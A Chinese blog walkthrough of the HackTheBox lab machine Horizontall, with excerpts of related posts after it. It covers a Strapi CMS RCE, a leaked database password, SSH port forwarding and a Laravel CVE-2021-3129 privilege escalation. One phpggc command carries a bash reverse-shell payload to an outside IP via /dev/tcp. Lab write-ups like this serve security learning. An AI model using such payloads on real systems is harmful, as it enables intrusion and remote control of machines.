HackTheBox | Horizontall

已于 2022-09-01 22:02:28 修改
阅读量945 收藏 1
点赞数 1
分类专栏: htb记录 文章标签: 网络安全
于 2022-08-08 11:01:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/126223697
版权

Horizontall

nmap扫描,开放22、80,80对应站点http://horizontall.htb

image-20220808083848092

访问80

image-20220808084055211

dirsearch扫描,也没有东西

image-20220808084601072

看wp之后发现在response的js文件里,有一个新的域名,虽然我仍然没找到

image-20220808085949263

修改hosts文件之后访问http://api-prod.horizontall.htb/

image-20220808090150591

找到一个admin路径,访问之后跳转到认证页面,使用了strapiCMS

image-20220808090419973

熟悉的套路就是Google exp,然后就找到了RCE

image-20220808091104100

使用脚本,成功RCE,但是是无回显

image-20220808091652191

直接反弹shell

image-20220808092652645

image-20220808092707362

检查/etc/passwd,看到developer用户

image-20220808092814117

strapi用户可以直接读取developer用户家目录下的user.txt

检查本地,存在MySQL

image-20220808094338813

尝试寻找MySQL数据库登录方式,在/opt/strapi/myapi/config/environments/development下的database.json中找到一堆账号密码developer/#J!:F9Zt2u

image-20220808094557891

但是该密码无法登录developer的ssh,还是从数据库入手。最终在数据库中找到strapi的管理员密码的密文值。

image-20220808095128616

上john爆破也没爆出来

image-20220808104102013

回顾前面的内容,发现本地还开放了13378000。探测这两个端口的服务,发现8000开放Lavarel

image-20220808100450552

写ssh公钥,用于之后的端口转发

本地ssh-keygen生成id_rsa.pub,然后将id_rsa.pub的内容写入strapi家目录下的.ssh/authorized_keys

本地设置ssh端口转发,将10.10.11.105主机上127.0.0.1:8000转发到本地的8000端口

image-20220808103125791

当再去访问本地的8000时,就访问到了10.10.11.105的8000端口上的Laravel服务,版本为v8

image-20220808103230081

Laravel存在CVE,之前的某道题中用到过,所以直接找exp进行利用了

https://github.com/ambionics/laravel-exploits

直接拿到root权限

image-20220808105019784

反弹shell

php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/1234 0>&1'"

image-20220808105710180

xxL7-
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0x02 HackTheBox系列之Horizontall
boss111的专栏
01-08 3011
1. 环境搭建 主机 IP地址 Horizontall 10.10.11.105 Kali 10.10.16.5 目标:获取用户主目录下的 user.txt 和 ROOT 主目录下的 root.txt 2. 信息收集 2.1 端口扫描 利用NMAP进行端口扫描: nmap -sV -A -p- 10.10.11.104 2.2 Web探测 2.3 目录爆破 利用 gobuster 目录/文件探测: gobuster dir -u http://horizontall.
CTF-Anubis HackTheBox 渗透测试(二)
hongrisec的博客
10-19 804
大家好,我是你们好朋友小峰。预计从今天开始,陆陆续续为大家推出 CTF-Horizontall HackTheBox 系列文章。
HackTheBox-Horizontall WP
h1nt的博客
09-07 1743
0x01 准备 该靶机设置了域名,需要手动在host文件配置ip地址。 配置完成后即可访问靶机。看到vue的图标也就不难看出这是一个前后端分离的网站,我们的目标应该主要放在后端的接口上。 0x02 user.txt 我安装的burp插件帮我找到了一个子域名,同样我们需要将其录入hosts文件中绑定靶机的ip,这样才能正常访问: 如下即可: 访问得到结果,但是不是我们想要的东西,我们可以通过目录扫描的方式查找接口: 对主域名horizontall.htb的目录扫描没有发现有用的
laravel-exploits:针对CVE-2021-3129的漏洞利用
05-25
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -----------
CVE-2021-3129:Laravel调试RCE
05-26
CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar.readonly 在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web.php添加路由(这个我加在源码里了,没写dockerfile里) 复现效果 脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。 通用性不强(至少打我自己的环境可以),大家可自行把phpggc的其它rce链也加进去,提高通杀能力。 参考资源
0x11-HackTheBox-Beep
0pr
05-26 362
目录 历史命令 目标 能学到什么? 什么是 Elastix? 什么是 FreePBX? Elastix FreePBX 远程代码执行漏洞 Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.p
HackTheBox 简单盒子 之 Horizontall (again,不简单)
rainrinser的博客
12-29 3628
1. Gobuster vhost + top1million wordlist 做 subdomain enum 2. ssh公钥制作,远程登陆 3. ssh端口转发 4. RCE理解
【Hack The Box】linux练习-- Horizontall
人间体佐菲的博客
11-28 422
【Hack The Box】linux练习-- Horizontall
CTF-Horizontall HackTheBox渗透测试(一)
ALLEN'Blog
01-29 362
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
keys.zip (hackthebox)
12-05
hackthebox Can you decrypt the message? Zip password: hackthebox
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子Hack The Box笔测试和来自挑战在这里,我们有Hack The Box的演练。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8338
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
该资源为YOLOv5中6.0版本的预测文件,增添了自动裁剪所需类别,同时还增加了自定义感兴趣区域检测
07-17
该资源为YOLOv5中6.0版本的预测文件,增添了自动裁剪所需类别,同时还增加了自定义感兴趣区域检测。 该资源的介绍我也将写成博客,其中有不明白的改动,可在博客中评论,或者直接私信我。
torchaudio-0.10.0+cpu-cp38-cp38-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
PISI 电源完整性-芯片电源design&simulation
最新发布
07-17
本资料是PISI领域的专业用书,针对电源完整性--芯片及系统的电源完整性建模与设计做出详细指导与说明,PI领域白皮书。 本资料仅用于学习交流用途,勿做商用。
hackthebox注册
05-10
如果您想注册HackTheBox,请按照以下步骤操作: 1. 访问HackTheBox网站:https://www.hackthebox.eu/ ... 3. 输入您的电子邮件地址并创建一个帐户。...您可以通过在HackTheBox的论坛上积极参与社区来获得邀请码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值